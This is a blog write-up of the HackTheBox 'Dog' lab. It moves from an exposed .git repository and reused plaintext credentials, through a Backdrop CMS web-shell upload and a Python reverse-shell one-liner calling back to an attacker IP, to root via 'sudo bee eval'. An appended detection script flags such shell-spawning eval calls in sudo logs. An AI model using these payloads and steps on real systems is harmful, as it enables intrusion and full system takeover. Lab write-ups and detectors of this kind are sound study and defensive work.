Virts's Blog

HackTheBox [Dog] WriteUp


GetShell

A port scan showed that only ports 22 and 80 were open, and SSH on port 22 did not allow password login.

Accessing the HTTP service, the site was fingerprinted as Backdrop CMS. A directory scan revealed an exposed .git directory, and the source code was recovered with GitHack.

python GitHack.py http://10.10.11.58/.git

Looking through the git commit history did not reveal much, but settings.php contained a plaintext database password.

$database = 'mysql://root:BackDropJ2024DS2024@<db-host>/backdrop';

This password could be reused in a password spray against the website's users. Only one user, dogBackDropSystem, was found, and the password did not work for it.

Continuing to gather information from the source code, usernames might also appear in email addresses, so the tree was grepped for the dog.htb domain.

grep -i "dog.htb" -R .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]b> 1738963331 +0000  commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]b> 1738963331 +0000     commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Another username, tiffany, was found. Combined with the previously found password BackDropJ2024DS2024, it logged into the admin backend, leaving the task of getting a shell.

An RCE vulnerability in Backdrop CMS was found on Exploit-DB. The zip package generated by the PoC was uploaded at http://10.10.11.58/?q=admin/modules/install, but the zip format was not accepted, so the shell folder generated by the PoC was packed with tar and uploaded manually at http://10.10.11.58/?q=admin/installer/manual.

The upload succeeded, and accessing http://10.10.11.58/modules/shell/shell.php confirmed RCE, although the uploaded file appeared to be cleaned up after a minute or two.

A local nc listener was started on port 9443.

nc -lv 9443

Then a Python reverse shell was executed through the uploaded shell.php.

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.45',9443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

The reverse shell connected back as www-data. Checking /etc/passwd revealed two users, jobert and johncusack. The earlier password BackDropJ2024DS2024 worked for the johncusack account, yielding the user flag.

cat /home/johncusack/user.txt

Privilege Escalation

sudo -l was used to list the commands the johncusack user may run with elevated privileges.

johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

A bee command was found, and its help showed that bee eval can execute arbitrary PHP code directly.

johncusack@dog:~$ bee help eval
eval, ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

Arguments:
 code
 The PHP code to evaluate.

Examples:
 bee eval '$node = node_load(1); print $node->title;'
 Loads node with nid 1 and then prints its title.

 bee eval "node_access_rebuild();"
 Rebuild node access permissions.

 bee eval "file_unmanaged_copy('$HOME/Pictures/image.jpg', 'public://image.jpg');"
 Copies a file whose path is determined by an environment's variable. Note the use of double quotes so the variable $HOME gets replaced by its value.

However, calling eval directly did not work.

johncusack@dog:~$ sudo bee eval "system('/bin/bash');"
sudo bee eval "system('/bin/bash');"

tput: unknown terminal "unknown"
tput: unknown terminal "unknown"
  The required bootstrap level for 'eval' is not ready.

Referring to this article, the --root parameter was needed to point bee at the website's root directory.

sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash');"

This gave a root shell.

cat /root/root.txt
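From the defender's side, the sudo rule above leaves a clear trail: every bee invocation through sudo is logged with its full command line. The following detection script is an added example, not part of the original write-up; it parses constructed auth.log lines modelled on the invocation above and ranks bee eval calls by whether their PHP argument spawns a process. The log format, severity labels, sample lines and the list of eval aliases (taken from the bee help output above) are assumptions.

```python
import re

# Constructed sample auth.log lines (not from the original post). The first
# COMMAND mirrors the bee invocation shown in the write-up.
SAMPLE_AUTH_LOG = """\
Mar  3 10:12:01 dog sudo: johncusack : TTY=pts/0 ; PWD=/home/johncusack ; USER=root ; COMMAND=/usr/local/bin/bee --root=/var/www/html eval system('/bin/bash');
Mar  3 10:13:44 dog sudo: johncusack : TTY=pts/0 ; PWD=/home/johncusack ; USER=root ; COMMAND=/usr/local/bin/bee --root=/var/www/html status
Mar  3 10:14:10 dog sudo: johncusack : TTY=pts/0 ; PWD=/home/johncusack ; USER=root ; COMMAND=/usr/local/bin/bee --root=/var/www/html eval print_r(config_get('system.core'));
Mar  3 10:15:02 dog sudo: deploy : TTY=pts/1 ; PWD=/srv ; USER=root ; COMMAND=/usr/bin/systemctl restart apache2
"""

# Fields sudo writes for each elevated command (assumed syslog layout)
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.*)$"
)

# bee subcommands that evaluate arbitrary PHP as the sudo target user
BEE_CODE_EXEC = {"eval", "ev", "php-eval"}
# PHP calls inside an eval argument that spawn a process or shell
SHELL_CALLS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")


def parse_sudo_line(line):
    """Return the sudo event fields for one log line, or None if not a sudo entry."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def classify(event):
    """Rate one sudo event: info (not bee), low (bee without eval), high (eval), critical (eval spawning a shell)."""
    cmd = event["cmd"]
    argv = cmd.split()
    if not argv[0].endswith("/bee"):
        return "info"
    # Skip option tokens such as --root=... to find the bee subcommand
    sub = next((a for a in argv[1:] if not a.startswith("-")), "")
    if sub not in BEE_CODE_EXEC:
        return "low"
    return "critical" if SHELL_CALLS.search(cmd) else "high"


def scan(log_text):
    """Parse every sudo line in log_text and attach a severity to each event."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_sudo_line(line)
        if ev is not None:
            ev["severity"] = classify(ev)
            findings.append(ev)
    return findings
```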
